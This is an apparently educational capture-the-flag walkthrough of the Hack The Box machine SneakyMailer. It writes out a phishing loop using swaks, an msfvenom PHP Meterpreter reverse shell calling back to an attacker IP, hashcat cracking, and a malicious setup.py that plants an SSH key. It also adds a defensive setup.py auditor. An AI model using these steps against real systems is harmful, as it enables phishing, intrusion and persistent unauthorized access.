This article provides a detailed walkthrough of the SneakyMailer challenge on Hack The Box. It shows how to obtain a list of email addresses from the company site, run a phishing email campaign against them, deploy a PHP shell via FTP, execute arbitrary code through a private PyPI server, and escalate privileges via the GTFOBins entry for pip3.
This machine has an IP address of 10.10.10.197, which I add to /etc/hosts.
10.10.10.197 sneakymailer.htb
First, a scan for open ports is performed.
#!/bin/bash
# Fast full-range port sweep, then a detailed (-A) scan of only the open ports.
ports=$(nmap -p- --min-rate=500 "$1" | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -p"$ports" -A "$1"
The scan output refers to the host name sneakycorp.htb, so we add it to /etc/hosts as well.
10.10.10.197 sneakycorp.htb
The website lists the employees together with their email addresses.
To collect all of the addresses at once we use an email extractor tool and save them to emails.txt.
Next we start a listener on port 80 to catch anyone who follows the link, and send the phishing email to every address with the swaks tool.
while read mail; do swaks --to $mail --from [email protected] --header 'Subject: News' --body 'Look it: http://10.10.14.114/' --server sneakymailer.htb | grep 'To:' ; done < emails.txt
Soon one of the users clicks the link, and our listener receives a request containing encoded data.
After decoding the data we get a password with which we can log in to the mail server.
We use Evolution as a client.
We enter the password when connecting and see two emails.
One of the emails reveals the password for the developer account (which also works for FTP) and mentions PyPI in connection with the user low.
After logging in to FTP and downloading the files, we notice that they are the source code of the site.
Let’s add the dev subdomain to /etc/hosts.
10.10.10.197 dev.sneakycorp.htb
With this write access we can place a PHP shell on the server. We generate the payload with msfvenom; in this case Meterpreter was chosen. The second command replaces the commented-out opening tag in the raw output with a plain <?php tag.
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.114 LPORT=4321 -f raw > r.php
cat r.php | xclip -selection clipboard && echo '<?php ' | tr -d '\n' > r.php && xclip -selection clipboard -o >> r.php
After placing the file in the dev directory, we start the listener.
handler -p php/meterpreter_reverse_tcp -H 10.10.14.114 -P 4321
After accessing our file, we get an active session.
Along the way we obtain an Apache $apr1$ password hash, saved as pypi.hash. We look up the matching hashcat mode and crack it with the rockyou wordlist.
hashcat --example | grep '$apr1' -A2 -B2
hashcat -m 1600 -a 0 pypi.hash ./tools/rockyou.txt
We will also add the found subdomain to /etc/hosts.
10.10.10.197 pypi.sneakycorp.htb
Uploading our own package lets us execute arbitrary code, because setup.py is ordinary Python that runs when the package is built or installed. A standard tutorial on creating a Python package covers the layout. First, we create a directory for the package.
Inside it we need the following files: __init__.py, .pypirc, README.md, setup.cfg, and setup.py. The setup.py file will contain the executable code. Below is an example setup.py that appends an SSH public key to the authorized_keys file of the user low (the key itself is elided).
from setuptools import setup

# Runs as the user who builds or installs the package, before setup() is reached.
try:
    f = open('/home/low/.ssh/authorized_keys', 'a')
    f.write('ssh-rsa ... ')
    f.close()
except:
    pass  # keep going so the package still builds if the write fails

setup(
    name='ralfpack',
    packages=['ralfpack'],
    description='R',
    version='0.1',
    url='http://pypi.sneakymailer.htb:8080/ralfpack',
    author='ralf',
    author_email='[email protected]',
    keywords=['pip', 'ralfpack', 'example']
)
We create an empty __init__.py (it only needs to exist), an empty README.md, and a setup.cfg that references README.md.
All that is left is the .pypirc file, in which we define a repository section (here named ralfpack) with the server's configuration.
We upload all files to the host.
We upgrade to a proper TTY shell and build the package.
python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 setup.py sdist
Now we upload it to the PyPI server.
python3 setup.py sdist upload -r ralfpack
The key has been successfully uploaded, and you can now connect to SSH using the private key to access the low user account.
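The reason this works is that setup.py is ordinary Python executed at build or install time, so a reviewer can spot such side effects statically before a package is accepted. As an added, defender-side example that is not part of the original write-up, the script below uses Python's ast module to flag top-level statements and risky calls in a setup.py; both samples are constructed here, the first modelled on the setup.py above with a placeholder key.

```python
import ast

# Constructed sample modelled on the write-up's setup.py: a top-level
# try/except writes a file before setup() is ever reached.
SAMPLE_SETUP_PY = """
from setuptools import setup
try:
    f = open('/home/low/.ssh/authorized_keys', 'a')
    f.write('ssh-rsa PLACEHOLDER_KEY')
    f.close()
except Exception:
    pass
setup(name='ralfpack', packages=['ralfpack'], version='0.1')
"""
# Constructed benign sample: an import and the setup() call only.
CLEAN_SETUP_PY = "from setuptools import setup\nsetup(name='ok', version='0.1')\n"

# Callees that have no business running at package build/install time.
SUSPICIOUS_CALLS = {"open", "system", "popen", "exec", "eval", "run",
                    "Popen", "check_output", "urlopen", "urlretrieve"}
# Top-level statements an ordinary setup.py consists of.
ALLOWED_TOPLEVEL = (ast.Import, ast.ImportFrom, ast.Assign, ast.AnnAssign,
                    ast.FunctionDef, ast.ClassDef)

def _dotted(expr):
    """Render a callee as a dotted name, e.g. 'os.system' or 'open'."""
    if isinstance(expr, ast.Name):
        return expr.id
    if isinstance(expr, ast.Attribute):
        return f"{_dotted(expr.value)}.{expr.attr}"
    return "?"

def audit_setup_py(source):
    """Return findings: top-level statements other than imports, assignments,
    definitions and the setup() call, plus suspicious calls anywhere."""
    tree = ast.parse(source)
    findings = []
    for stmt in tree.body:
        if isinstance(stmt, ALLOWED_TOPLEVEL):
            continue
        if (isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call)
                and _dotted(stmt.value.func) == "setup"):
            continue
        findings.append(f"line {stmt.lineno}: top-level {type(stmt).__name__} outside setup()")
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name.split(".")[-1] in SUSPICIOUS_CALLS:
                findings.append(f"line {node.lineno}: call to {name}()")
    return findings
```

Run against the write-up style sample it reports the top-level try block and the open() call; against the benign sample it reports nothing.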
Checking the sudo configuration reveals that the pip3 command can be run with root privileges, which opens the way to privilege escalation through pip3 itself.
We turn to GTFOBins and find the instructions for obtaining a shell through pip.
Repeating those steps gives us a shell as root.
This article described the completion of the SneakyMailer machine on Hack The Box. Through port scanning, a phishing mailing, PHP shell deployment, and work with a private PyPI server, we gained access to user accounts, and finally used the sudo right to run pip3 as root to take full control of the system. The walkthrough is useful for understanding the practical side of information security.